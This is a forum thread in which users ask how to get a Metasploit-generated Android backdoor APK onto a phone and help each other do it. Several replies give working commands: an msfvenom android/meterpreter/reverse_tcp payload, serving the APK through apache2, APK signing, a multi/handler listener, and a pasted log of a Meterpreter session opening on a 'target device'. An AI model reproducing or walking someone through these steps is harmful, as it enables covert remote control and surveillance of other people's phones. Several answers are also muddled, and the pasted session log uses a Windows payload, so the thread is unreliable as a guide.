Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone

19 Responses

Emailing it to yourself and downloading it on your mobile then using a file explorer like Astro should work.

The easiest way is to just connect your phone to you PC via USB and drag it over though.

What if I'm usin a vbox...
And .apk detected virus so can't forward it to ur mail
What to do now?

Just put it on google drive and download it on ur second device from it

it is simple my frend ...all you need is to enable the apache2 service on your attacking machine by typeint the following command

service apache2 start

then move the apk to the following path /var/www/html ..let us assume that the ap is in the desktop so u have to type the following

mv /root/desktop/sfsdfs.apk /var/www/html
then go to your phone and type this
your local ip address/sfsdf.apk ..and it will be downloaded
hope that aswers your question

Missing destination file operand after /root/.............../html
Help me pls!!!!

then go to your phone and type this
your local ip address/sfsdf.apk

in this thing iam getting error, site is not opening and saying site is not rechable

use sudo service apache2 start

well I did the same thing but the problem is when entered the ip address and name of the apk file, all I got was the err_ connection refused

Hey hi While moving this file it's showing PERMISSION DENIED if you know how to solve this pls share your solution ??
Thanq.

youv'e probably figured it out by now but. I thought Id expand a bit on the previous answers.

you need to make sure you have "unknown sources" set to allow. You should be able to find it in your phones security settings most likely.

Also you will probably have to sign the apk to avoid the "parsing" error. You should be able to open a kali terminal and use the command "d2j-apk-sign nameof.apk". Alternatively you can use an app called "zipsigner"(among others) from google play and do it after you dl it to your phone.

Lastly as Luke mentioned, just use a file manager to find and select the apk.

Hi guys who could help me to solve a problem related to the download on my android device of the apk file created with msfvenom ??? I'll explain better, in a few words I created the apk file with msfvenom in the following way: msfvenom -p android / meterpreter / reverse_tcp LHOST = myIP LPORT = 4444 R> /var/www/html/linux.apk after I file it created I start the apache2 server with the command sudo service apache2 start. after that I start the msfconsole and start setting the exploit / multi / handler. set LHOST and LPORT then exploits and everything is listening, but when I go to my android device and try to enter the IP address in the URL search bar nothing happens ... I also tried to enter IP followed by the port for example : myIP: 4444 but nothing, then also in this way: myIP: 4444 / linux.apk and not even so .... I tried in different ways but they all give this result! please help! ????????????

after setting "use exploit/multi/handler" . you have to use command "set payload android/meterpreter/reverse_tcp" then set lhost (local ip (if your android and hacking machine is in same network) or public ip (if you are using it over another it )).. :) if you get stuck. reply with ifinity > and your dought.

thanks.....

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.xx.xxx
lhost => 192.168.xx.xxx
msf5 exploit(multi/handler) > exploit

* Started reverse TCP handler on 192.168.xx.xxx:4444
* Sending stage (201283 bytes) to 192.168.xx.xx
* Meterpreter session 1 opened (192.168.xx.xxx:4444 -> 192.168.xx.xx:49567) at 2020-08-23 08:30:25 -0700

  1. Connect your target device and your system in same network (like same wi-fi)
  2. Open your target device browser and type "http://YoursystemIP:80/linux.apk

Reply if it helped

Bro, i did it but it didnt worked, what if i trnafer my file through usb connection to my phone then exploit, will it work?

Please help!!!!!!!

I created an apk but after i installed it in my phone to get into my phone, the app shows me that it's been made for an older version and reverse tcp handler gets stuck....

How do i get out of this trouble please help ????..

It will work though

  1. In msfconsole exploit(multi/handler), type"exploit"
  2. It will create a session. Then open the apk file in your target device
  3. Make sure both device connected in same network

Share Your Thoughts

  • Hot
  • Active